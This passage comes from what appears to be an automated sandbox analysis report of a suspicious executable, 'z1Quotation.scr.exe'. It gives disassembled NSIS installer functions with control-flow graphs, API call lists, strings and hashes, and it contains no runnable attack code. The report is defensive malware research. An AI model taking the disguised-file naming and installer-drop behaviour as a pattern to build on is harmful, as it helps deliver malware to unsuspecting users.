                                                                                                                  • Instruction Fuzzy Hash: EBD012315050206BC2402738AE4C85B7A9AAF193347518B77F5AAF21E0C7B48C72C69C
                                                                                                                  Function 00403BA7 Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215stringregistryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 310 403ba7-403bbf call 4067c6 313 403bc1-403bd1 call 4062fc 310->313 314 403bd3-403c04 call 406285 310->314 323 403c27-403c50 call 403e6c call 405e1e 313->323 319 403c06-403c17 call 406285 314->319 320 403c1c-403c22 lstrcatA 314->320 319->320 320->323 328 403c56-403c5b 323->328 329 403cd7-403cdf call 405e1e 323->329 328->329 330 403c5d-403c75 call 406285 328->330 335 403ce1-403ce8 call 406431 329->335 336 403ced-403d12 LoadImageA 329->336 334 403c7a-403c81 330->334 334->329 337 403c83-403c85 334->337 335->336 339 403d93-403d9b call 40140b 336->339 340 403d14-403d44 RegisterClassA 336->340 341 403c96-403ca2 lstrlenA 337->341 342 403c87-403c94 call 405d5b 337->342 353 403da5-403db0 call 403e6c 339->353 354 403d9d-403da0 339->354 343 403e62 340->343 344 403d4a-403d8e SystemParametersInfoA CreateWindowExA 340->344 348 403ca4-403cb2 lstrcmpiA 341->348 349 403cca-403cd2 call 405d30 call 40639e 341->349 342->341 347 403e64-403e6b 343->347 344->339 348->349 352 403cb4-403cbe GetFileAttributesA 348->352 349->329 357 403cc0-403cc2 352->357 358 403cc4-403cc5 call 405d77 352->358 363 403db6-403dd0 ShowWindow call 406758 353->363 364 403e39-403e3a call 4055b4 353->364 354->347 357->349 357->358 358->349 371 403dd2-403dd7 call 406758 363->371 372 403ddc-403dee GetClassInfoA 363->372 368 403e3f-403e41 364->368 369 403e43-403e49 368->369 370 403e5b-403e5d call 40140b 368->370 369->354 373 403e4f-403e56 call 40140b 369->373 370->343 371->372 376 403df0-403e00 GetClassInfoA RegisterClassA 372->376 377 403e06-403e29 DialogBoxParamA call 40140b 372->377 373->354 376->377 381 403e2e-403e37 call 403af7 377->381 381->347
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004067C6: GetModuleHandleA.KERNEL32(?,00000000,?,00403613,0000000C), ref: 004067D8
                                                                                                                    • Part of subcall function 004067C6: GetProcAddress.KERNEL32(00000000,?), ref: 004067F3
                                                                                                                  • lstrcatA.KERNEL32(1033,Inaugurates Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inaugurates Setup: Installing,00000000,00000002,76273410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\z1Quotation.scr.exe",0000000A,0000000C), ref: 00403C22
                                                                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55,1033,Inaugurates Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inaugurates Setup: Installing,00000000,00000002,76273410), ref: 00403C97
                                                                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403CAA
                                                                                                                  • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\z1Quotation.scr.exe",0000000A,0000000C), ref: 00403CB5
                                                                                                                  • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55), ref: 00403CFE
                                                                                                                    • Part of subcall function 004062FC: wsprintfA.USER32 ref: 00406309
                                                                                                                  • RegisterClassA.USER32(00423AE0), ref: 00403D3B
                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403D53
                                                                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403D88
                                                                                                                  • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\z1Quotation.scr.exe",0000000A,0000000C), ref: 00403DBE
                                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00423AE0), ref: 00403DEA
                                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit,00423AE0), ref: 00403DF7
                                                                                                                  • RegisterClassA.USER32(00423AE0), ref: 00403E00
                                                                                                                  • DialogBoxParamA.USER32(?,00000000,00403F44,00000000), ref: 00403E1F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                  • String ID: "C:\Users\user\Desktop\z1Quotation.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55$Call$Control Panel\Desktop\ResourceLocale$Inaugurates Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$:B
                                                                                                                  • API String ID: 1975747703-2381457433
                                                                                                                  • Opcode ID: d5bb22f9f1d536487da9fc4894c17167cb22e3e835f20a77c150f20fdccb41cb
                                                                                                                  • Instruction ID: 41b693a1e09e428fcb48bc460460f8167bdfdfad3fe1490a38c1de9dc4895bb0
                                                                                                                  • Opcode Fuzzy Hash: d5bb22f9f1d536487da9fc4894c17167cb22e3e835f20a77c150f20fdccb41cb
                                                                                                                  • Instruction Fuzzy Hash: C561B670340204AEE620AF659D46F373E6CEB8474AF40453FF945B62E2DB7D9D028A6D
                                                                                                                  Function 00402F61 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 384 402f61-402faf GetTickCount GetModuleFileNameA call 405f31 387 402fb1-402fb6 384->387 388 402fbb-402fe9 call 40639e call 405d77 call 40639e GetFileSize 384->388 389 4031fb-4031ff 387->389 396 4030d4-4030e2 call 402ec2 388->396 397 402fef 388->397 403 4031b3-4031b8 396->403 404 4030e8-4030eb 396->404 399 402ff4-40300b 397->399 401 40300d 399->401 402 40300f-403018 call 403473 399->402 401->402 410 40301e-403025 402->410 411 40316f-403177 call 402ec2 402->411 403->389 406 403117-403163 GlobalAlloc call 4068eb call 405f60 CreateFileA 404->406 407 4030ed-403105 call 403489 call 403473 404->407 430 403165-40316a 406->430 431 403179-4031a9 call 403489 call 403202 406->431 407->403 433 40310b-403111 407->433 415 4030a1-4030a5 410->415 416 403027-40303b call 405eec 410->416 411->403 420 4030a7-4030ae call 402ec2 415->420 421 4030af-4030b5 415->421 416->421 436 40303d-403044 416->436 420->421 427 4030c4-4030cc 421->427 428 4030b7-4030c1 call 40687d 421->428 427->399 432 4030d2 427->432 428->427 430->389 445 4031ae-4031b1 431->445 432->396 433->403 433->406 436->421 437 403046-40304d 436->437 437->421 440 40304f-403056 437->440 440->421 442 403058-40305f 440->442 442->421 444 403061-403081 442->444 444->403 446 403087-40308b 444->446 445->403 447 4031ba-4031cb 445->447 448 403093-40309b 446->448 449 40308d-403091 446->449 450 4031d3-4031d8 447->450 451 4031cd 447->451 448->421 452 40309d-40309f 448->452 449->432 449->448 453 4031d9-4031df 450->453 451->450 452->421 453->453 454 4031e1-4031f9 call 405eec 453->454 454->389
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 00402F75
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\z1Quotation.scr.exe,00000400), ref: 00402F91
                                                                                                                    • Part of subcall function 00405F31: GetFileAttributesA.KERNELBASE(00000003,00402FA4,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405F35
                                                                                                                    • Part of subcall function 00405F31: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F57
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1Quotation.scr.exe,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00402FDA
                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,0000000A), ref: 0040311C
                                                                                                                  Strings
                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004031B3
                                                                                                                  • Error launching installer, xrefs: 00402FB1
                                                                                                                  • Null, xrefs: 00403058
                                                                                                                  • C:\Users\user\Desktop\z1Quotation.scr.exe, xrefs: 00402F7B, 00402F8A, 00402F9E, 00402FBB
                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403165
                                                                                                                  • soft, xrefs: 0040304F
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F6B, 00403134
                                                                                                                  • Inst, xrefs: 00403046
                                                                                                                  • "C:\Users\user\Desktop\z1Quotation.scr.exe", xrefs: 00402F6A
                                                                                                                  • C:\Users\user\Desktop, xrefs: 00402FBC, 00402FC1, 00402FC7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                  • String ID: "C:\Users\user\Desktop\z1Quotation.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z1Quotation.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                  • API String ID: 2803837635-1609947119
                                                                                                                  • Opcode ID: b635acffbff0ba399469ee59140565eb1758717ff91dfd29eb8e6c25685f07b8
                                                                                                                  • Instruction ID: 0bbd164077d35f5d41e45e704235660fd1a3578270fe536f9c5373faf3e76675
                                                                                                                  • Opcode Fuzzy Hash: b635acffbff0ba399469ee59140565eb1758717ff91dfd29eb8e6c25685f07b8
                                                                                                                  • Instruction Fuzzy Hash: 1B71C331A01218ABDB20DFA5DD85BAE7BACEB04355F24403BF911B62D1C73C9E458B9C
                                                                                                                  Function 00406431 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 208stringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 457 406431-40643c 458 40643e-40644d 457->458 459 40644f-406464 457->459 458->459 460 406675-406679 459->460 461 40646a-406475 459->461 462 406487-406491 460->462 463 40667f-406689 460->463 461->460 464 40647b-406482 461->464 462->463 467 406497-40649e 462->467 465 406694-406695 463->465 466 40668b-40668f call 40639e 463->466 464->460 466->465 469 4064a4-4064da 467->469 470 406668 467->470 471 4064e0-4064ea 469->471 472 406612-406615 469->472 473 406672-406674 470->473 474 40666a-406670 470->474 477 406507 471->477 478 4064ec-4064f5 471->478 475 406645-406648 472->475 476 406617-40661a 472->476 473->460 474->460 481 406656-406666 lstrlenA 475->481 482 40664a-406651 call 406431 475->482 479 40662a-406636 call 40639e 476->479 480 40661c-406628 call 4062fc 476->480 484 40650e-406516 477->484 478->477 483 4064f7-4064fa 478->483 494 40663b-406641 479->494 480->494 481->460 482->481 483->477 490 4064fc-4064ff 483->490 485 406518 484->485 486 40651f-406521 484->486 485->486 491 406523-406546 call 406285 486->491 492 406558-40655b 486->492 490->477 495 406501-406505 490->495 505 4065f9-4065fd 491->505 506 40654c-406553 call 406431 491->506 498 40655d-406569 GetSystemDirectoryA 492->498 499 40656e-406571 492->499 494->481 497 406643 494->497 495->484 501 40660a-406610 call 406698 497->501 502 4065f4-4065f7 498->502 503 406582-406585 499->503 504 406573-40657f GetWindowsDirectoryA 499->504 501->481 502->501 502->505 503->502 508 406587-4065a5 503->508 504->503 505->501 510 4065ff-406605 lstrcatA 505->510 506->502 512 4065a7-4065aa 508->512 513 4065bc-4065d4 call 4067c6 508->513 510->501 512->513 516 4065ac-4065b0 512->516 520 4065d6-4065e9 SHGetPathFromIDListA CoTaskMemFree 513->520 521 4065eb-4065f2 513->521 518 4065b8-4065ba 516->518 518->502 518->513 520->502 520->521 521->502 521->508
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406563
                                                                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000), ref: 00406579
                                                                                                                  • SHGetPathFromIDListA.SHELL32(00000000,Call,?,0040551A,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000), ref: 004065D8
                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,0040551A,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000), ref: 004065E1
                                                                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000), ref: 00406605
                                                                                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 00406657
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                  • API String ID: 4024019347-3117123173
                                                                                                                  • Opcode ID: c4fd0bb2a3dfb02e40212f4ed3959dfb6421695ba686638a02d62f4d64be6732
                                                                                                                  • Instruction ID: 7c4c910373eafea385a6f891537154e2e7eec3ea415f7131f24d96079dd5e5fd
                                                                                                                  • Opcode Fuzzy Hash: c4fd0bb2a3dfb02e40212f4ed3959dfb6421695ba686638a02d62f4d64be6732
                                                                                                                  • Instruction Fuzzy Hash: 4E612570A00214AAEB209F64DC81B7E7BA4AB55718F12413FE807B72D1C67E8961DB5D
                                                                                                                  Function 0040175E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 591 40175e-401781 call 402c3e call 405d9d 596 401783-401789 call 40639e 591->596 597 40178b-40179d call 40639e call 405d30 lstrcatA 591->597 602 4017a2-4017a8 call 406698 596->602 597->602 607 4017ad-4017b1 602->607 608 4017b3-4017bd call 406731 607->608 609 4017e4-4017e7 607->609 617 4017cf-4017e1 608->617 618 4017bf-4017cd CompareFileTime 608->618 610 4017e9-4017ea call 405f0c 609->610 611 4017ef-40180b call 405f31 609->611 610->611 619 401883-4018ac call 4054e2 call 403202 611->619 620 40180d-401810 611->620 617->609 618->617 634 4018b4-4018c0 SetFileTime 619->634 635 4018ae-4018b2 619->635 621 401812-401854 call 40639e * 2 call 406431 call 40639e call 405ab4 620->621 622 401865-40186f call 4054e2 620->622 621->607 654 40185a-40185b 621->654 632 401878-40187e 622->632 637 402ad3 632->637 636 4018c6-4018d1 CloseHandle 634->636 635->634 635->636 639 4018d7-4018da 636->639 640 402aca-402acd 636->640 641 402ad5-402ad9 637->641 643 4018dc-4018ed call 406431 lstrcatA 639->643 644 4018ef-4018f2 call 406431 639->644 640->637 650 4018f7-40238f 643->650 644->650 655 402394-402399 650->655 656 40238f call 405ab4 650->656 654->632 657 40185d-40185e 654->657 655->641 656->655 657->622
                                                                                                                  APIs
                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines,00000000,00000000,00000031), ref: 0040179D
                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines,00000000,00000000,00000031), ref: 004017C7
                                                                                                                    • Part of subcall function 0040639E: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,00403674,Inaugurates Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 004063AB
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                    • Part of subcall function 004054E2: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                    • Part of subcall function 004054E2: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsi8284.tmp$C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines$Call
                                                                                                                  • API String ID: 1941528284-4148209253
                                                                                                                  • Opcode ID: 3424df144c6e09f928790df488bf4d063cbf4bb8a78358d11ae0ea4c2993c558
                                                                                                                  • Instruction ID: 377c01cbd88b445a1e8d98a8910e1c06294cc623398d9cc98c62aed76c56130d
                                                                                                                  • Opcode Fuzzy Hash: 3424df144c6e09f928790df488bf4d063cbf4bb8a78358d11ae0ea4c2993c558
                                                                                                                  • Instruction Fuzzy Hash: 4941D831900615BBCF10BBA5CC45DAF3669DF01328B61823BF522B11E2DA7C4A518BAD
                                                                                                                  Function 004054E2 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73stringwindowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 658 4054e2-4054f7 659 4055ad-4055b1 658->659 660 4054fd-40550f 658->660 661 405511-405515 call 406431 660->661 662 40551a-405526 lstrlenA 660->662 661->662 664 405543-405547 662->664 665 405528-405538 lstrlenA 662->665 667 405556-40555a 664->667 668 405549-405550 SetWindowTextA 664->668 665->659 666 40553a-40553e lstrcatA 665->666 666->664 669 4055a0-4055a2 667->669 670 40555c-40559e SendMessageA * 3 667->670 668->667 669->659 671 4055a4-4055a7 669->671 670->669 671->659
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                  • lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                  • String ID: 9/@$Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll
                                                                                                                  • API String ID: 2531174081-3549388143
                                                                                                                  • Opcode ID: bbe00a10e9b98f436442815a186a67565d49adff4bb54cd9c218e6a45670779c
                                                                                                                  • Instruction ID: ffab86a0d0e44f80a4eafd93b27a58fcb6c1b625d5b9842166ece942144b6aee
                                                                                                                  • Opcode Fuzzy Hash: bbe00a10e9b98f436442815a186a67565d49adff4bb54cd9c218e6a45670779c
                                                                                                                  • Instruction Fuzzy Hash: 97219D71A00118BECF119FA5CD80ADEBFBAEB04354F44807AF944B6291C7398E51CFA8
                                                                                                                  Function 00406758 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 672 406758-406778 GetSystemDirectoryA 673 40677a 672->673 674 40677c-40677e 672->674 673->674 675 406780-406788 674->675 676 40678e-406790 674->676 675->676 677 40678a-40678c 675->677 678 406791-4067c3 wsprintfA LoadLibraryExA 676->678 677->678
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040676F
                                                                                                                  • wsprintfA.USER32 ref: 004067A8
                                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004067BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
